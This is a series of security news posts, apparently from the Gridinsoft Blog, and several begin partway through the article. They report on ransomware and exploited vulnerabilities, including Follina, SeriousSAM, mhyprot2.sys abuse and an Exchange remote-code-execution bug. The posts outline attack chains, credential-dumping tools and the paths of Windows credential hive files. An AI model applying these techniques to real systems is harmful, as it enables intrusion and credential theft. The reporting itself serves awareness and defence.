Let me remind you that we also wrote that Ransomware publishes data stolen from Cisco.

Lorenz has been active since at least 2021 and is engaged in the usual double extortion: not only encrypting the files on the machines of its victims, but also stealing the data of the affected companies, and then threatening to release them if they do not receive a ransom.

Last year, the group was credited with an attack on the EDI provider Commport Communications, and this year, researchers have recorded Lorenz activity in the US, China and Mexico, where hackers attacked small and medium-sized businesses.

As Arctic Wolf analysts now report, the hack group is exploiting the CVE-2022-29499 vulnerability, discovered and patched in June 2022. This bug in Mitel MiVoice VoIP devices allows remote arbitrary code execution (RCE) and the creation of a reverse shell on the victim’s network.

Mitel VoIP solutions are used by organizations and governments in mission-critical sectors around the world. According to information security expert Kevin Beaumont, there are currently more than 19,000 devices open to attacks over the Internet.

Read also our article on Methods Hackers Use to Infect You Ransomware.

In general, Lorenz’s tactics are similar to those described in the report of the CrowdStrike company, which discovered this bug and monitored the ransomware that used it. So, after the initial compromise, Lorenz deploys a copy of the Chisel open-source tool for TCP tunneling on the affected company’s network and uses it to move sideways.

At the same time, Arctic Wolf experts note that after a Mitel device is compromised, hackers wait about a month, and only then begin to develop their attack further.

The researchers write that hackers use well-known and widely used tools to create a dump of credentials and subsequent reconnaissance. The grouping then begins lateral movement using compromised credentials (including those from a hacked domain administrator account).

Before encrypting the victim’s files, Lorenz steals information using the FileZIlla file-sharing application. BitLocker is used to encrypt the victim’s files afterwards.

The post Lorenz Ransomware Penetrates Company Networks through Mitel VoIP Products appeared first on Gridinsoft Blog.

Let me remind you that we also wrote that Tencent and Chinese police conducted a joint operation against game cheat developers.

The mhypro2.sys problem has been known since at least 2020, and information security experts have long been appealing to manufacturers of anti-cheat systems in general, since most of these solutions work at the ring 0 level, which can hardly be considered safe.

In the case of mhypro2.sys, the appeals of experts had no effect, the code signing certificate was not revoked, and therefore the program can still be installed on Windows without raising alarm. Worse, since 2020, two PoC exploits are available on GitHub at once and a detailed description of how you can use anti-cheat from user mode to read/write kernel memory with kernel mode privileges, terminate specific processes, and so on.

A recent Trend Micro report states that hackers have been abusing the driver since July 2022 and using it to disable properly configured security solutions.

Analysts write that in the example they studied, the attackers used secretsdump and wmiexec against the target machine, and then connected to the domain controller via RDP using stolen administrator credentials.

The first action taken by the hackers on the compromised machine was to transfer mhyprot2.sys to the desktop along with the malicious executable kill_svc.exe that was used to install the driver. The attackers then downloaded the avg.msi file, which in turn downloaded and executed the following four files:

1. logon.bat – launches HelpPane.exe, “kills” the antivirus and other services, launches svchost.exe;
2. HelpPane.exe – disguises itself as the Microsoft Help and Support executable file, similar to kill_svc.exe, as it installs mhyprot2.sys and “kills” anti-virus services;
3. mhyprot2.sys – Genshin Impact anti-cheat driver;
4. svchost.exe – An unnamed ransomware payload.

In this incident, the hackers tried three times to encrypt the files on the compromised workstation, but were unsuccessful, but the anti-virus services were successfully disabled. In the end, the attackers simply moved logon.bat to the desktop, running it manually, and it worked.

By the end of the attack, the hackers uploaded the driver, ransomware, and the kill_svc.exe executable to a network share for mass deployment, aiming to infect as many workstations as possible.

Trend Micro warns that hackers may continue to use the anti-cheat module, because even if the vendor does fix the vulnerability, old versions of mhypro2.sys will still be in use, and the module can be integrated into any malware. At the same time, experts note that while code-signing modules that act as device drivers that can be abused are still quite rare.

In response to the publication of this report, well-known information security expert Kevin Beaumont noted on Twitter that administrators can protect against this threat by blocking the hash “0466e90bf0e83b776ca8716e01d35a8a2e5f96d3”, which corresponds to the vulnerable mhypro2.sys driver.

The post Genshin Impact Game’s Anti-Cheat Driver Is Used to Disable Antiviruses appeared first on Gridinsoft Blog.

Let me remind you that we also wrote that Lapsus$ hack group stole the source codes of Microsoft products, and also that Microsoft Has Not Fully Coped with PetitPotam Attacks in Windows NTLM Relay.

The discovery of Follina is a very worrying sign, as the vulnerability opens up a new attack vector using Microsoft Office. The fact is that the bug works without elevated privileges, allowing to bypass Windows Defender and does not require the activation of macros to execute binaries or scripts.

The first malicious Word document intended to exploit this bug was discovered by the information security specialist nao_sec, who spotted a file on VirusTotal downloaded from a Belarusian IP address. Apparently, attacks on this problem began as early as April 2022, and hackers used fake interview invitations and sexual extortion as baits for their victims.

Well-known information security expert Kevin Beaumont studied the find of his colleague, deciphered the code and explained in his blog that this is a command line string that Microsoft Word executes using MSDT, even if macros are disabled. Beaumont elaborates that a malicious Word document uses a remote template feature to download an HTML file from a server. This HTML then uses the Microsoft MS-MSDT URI scheme to load additional code and execute the PowerShell code.

It is noted that this activates the Protected View feature in Microsoft Office, designed to warn about files from potentially unsafe sources, but, according to Beaumont, this warning can be bypassed by using a Rich Text Format (RTF) file. Thus, malicious code can work “even without opening the document, that is, through the preview in Explorer.”

According to Bleeping Computer, many information security specialists have already studied the found malicious document and successfully reproduced the exploit on several versions of Microsoft Office. As a result, the researchers confirmed the presence of a vulnerability in Office 2013, 2016, Office Pro Plus April version (Windows 11 with May updates) and Office 2021 version with all patches.

According to experts, an attacker can use such an exploit to access various places on the victim’s network. Depending on the payload, the attacker can collect password hashes from the victim’s Windows machines, which can be useful for further post-exploitation.

A detailed technical description of the exploit is already available on the Huntress blog.

Interestingly, it now turns out that the Follina vulnerability was discovered back in April of this year, and Microsoft has already been notified about it.

So, according to screenshots posted by crazyman, a member of the Shadow Chaser Group (an association of college students engaged in the search and analysis of APT), Microsoft was informed about the vulnerability, but the company considered it to be “a non-security issue.” Microsoft argued that msdt.exe was indeed running, but it required a password to run, and the company was unable to reproduce the exploit.

Now Microsoft has acknowledged that the problem is still related to security: the vulnerability has already received the identifier CVE-2022-30190, and it is reported that the bug affects all versions of Windows that receive security updates, that is, Windows 7 and newer, as well as Server 2008 and newer.

Since there is no patch yet, administrators and users can block attacks on CVE-2022-30190 by disabling the MSDT URI protocol, which attackers use to launch debuggers and execute code on vulnerable systems.

Although Microsoft Defender version 1.367.719.0 is already able to detect the use of a vulnerability by signatures, and Protected View and Application Guard in Microsoft Office should block attacks, security experts warn that protective functions are powerless if the attack is carried out through a preview in Explorer, and not through opening a document. Therefore, it is also recommended to disable the preview in Windows Explorer.

The post Attackers Are Already Exploiting the Fresh 0-day Follina Bug in Microsoft Office appeared first on Gridinsoft Blog.

All versions of Windows 10 released in the last 2.5 years (as well as Windows 11) are vulnerable to an issue dubbed SeriousSAM and HiveNightmare. Thanks to this bug, an attacker can elevate his privileges and gain access to passwords from user accounts.

The vulnerability relates to how Windows 10 controls access to files such as SAM, SECURITY, and SYSTEM:

• C:\Windows\System32\config\sam
• C:\Windows\System32\config\security
• C:\Windows\System32\config\system

Let me remind you that these files store information such as hashed passwords for all Windows user accounts, security-related settings, encryption key data, and other important information about the OS kernel configuration. If a potential attacker can read the files, the information obtained will help him to gain access to user passwords and critical system settings.

Normally, only a Windows administrator can interact with these files. However, while testing Windows 11, the expert noticed that although the OS restricts access to these files for low-level users, the available copies of the files are saved in shadow copies. Moreover, as it turned out, this problem appeared in the Windows 10 code back in 2018, after the release of version 1809.

Gaining access to the Security Account Manager (SAM) configuration file is always a huge challenge as it can steal hashed passwords, crack those hashes, and hijack accounts. Even worse, SYSTEM and SECURITY can also contain similar other, equally dangerous data, including DPAPI encryption keys and Machine Account details (used to join computers to Active Directory). Below you can see a demonstration of such an attack, recorded by the creator of Mimikatz, Benjamin Delpy.

Microsoft has already acknowledged the problem and assigned it an ID CVE-2021-36934.

So far, Microsoft is only investigating the issue and is working on a patch that will most likely be released as an emergency security update later this week. So far, the company only recommends restricting access to the problem folder, as well as deleting shadow copies.

It is worth noting that well-known information security expert Kevin Beaumont has already published a PoC exploit for SeriousSAM so that admins can check which of their systems are vulnerable to attacks.

Let me remind you that I also reported that Windows 10 bug causes BSOD when opening a specific path.

The post Vulnerability in Windows 10 could allow gaining administrator privileges appeared first on Gridinsoft Blog.

The malware is already uploaded to VirusTotal.

The Record, which has already studied this leak, reports that the Babuk Locker builder can be used to create custom versions of the ransomware and be used to encrypt files on Windows systems, ARM-based NAS, VMWare ESXi servers.

The constructor also creates its own decryptor for each ransomware that can be used to recover the encrypted files of each victim.

The leak came two months after Babuk Locker operators announced cessation of their activity, following a high-profile attack on the Washington police department.

It is believed that the hackers renamed their “leak site” to Payload.bin, and now the group provides it to other criminals as a third-party hosting, where you can lease someone’s files without starting your own site for this purpose.

It is not yet clear whether the authors of Babuk Locker tried to sell their builder to a third party (and he got into the network as a result of an unsuccessful deal), or someone from the group’s competitors or cybersecurity experts arranged the leak.

The Babuk constructor was also leaked two weeks after the source code of the Paradise ransomware constructor was also posted on a public hacker forum.

While the two incidents are believed to be unrelated, both are of concern to cybersecurity experts who believe that cybercriminal gangs will now use the two tools for future and potentially devastating attacks.

Let me remind you that I also wrote that Clop ransomware continues to work even after a series of arrests.

The post Babuk Locker ransomware builder leaked into the network appeared first on Gridinsoft Blog.

The problem is related to the operation of the Exchange Control Panel (ECP) component and the inability of Microsoft Exchange to create unique cryptographic keys during installation.

“The bug allows authenticated attackers remotely execute arbitrary code with SYSTEM privileges and completely compromise the vulnerable server”, – describe the problem Microsoft experts.

Demonstration of the problem with using static cryptographic keys on an unpatched server has already been published by Zero Day Initiative (see video below). Researchers warn that any remote attacker, which compromises the device or credentials of an employee of the company, will be able to go to the Exchange server and will be able to read and fake corporate mail.

Well-known information security experts Kevin Beaumont and Troy Mursch from Bad Packets are already warning about mass scanning of the network in search of vulnerable servers.

“CVE-2020-0688 mass scanning activity has begun. That was quick, since 2 hours ago seeing likely mass scanning for CVE-2020-0688 (Microsoft Exchange 2007+ RCE vulnerability)”, — writes Kevin Beaumont.

Experts point out that authentication on target servers is not a problem for attackers. They pass it through with the tools for collecting information about company employees on LinkedIn, and then use this data, combined with credential stuffing, and also Outlook Web Access (OWA) and ECP.

“This vulnerability just spills credentials. You are logged in with SYSTEM privileges. Start Mimikatz. Exchange stores user credentials in memory, in plain text format, so you end up with all user passwords without hashing”, – writes Kevin Beaumont.

Administrators of the vulnerable server recommend installing patches as soon as possible.

I also recall that recently Microsoft advised administrators to disable the SMBv1 protocol on Exchange servers to protect against threats that exploit its vulnerabilities.

The post Hackers scan network for vulnerable Microsoft Exchange servers appeared first on Gridinsoft Blog.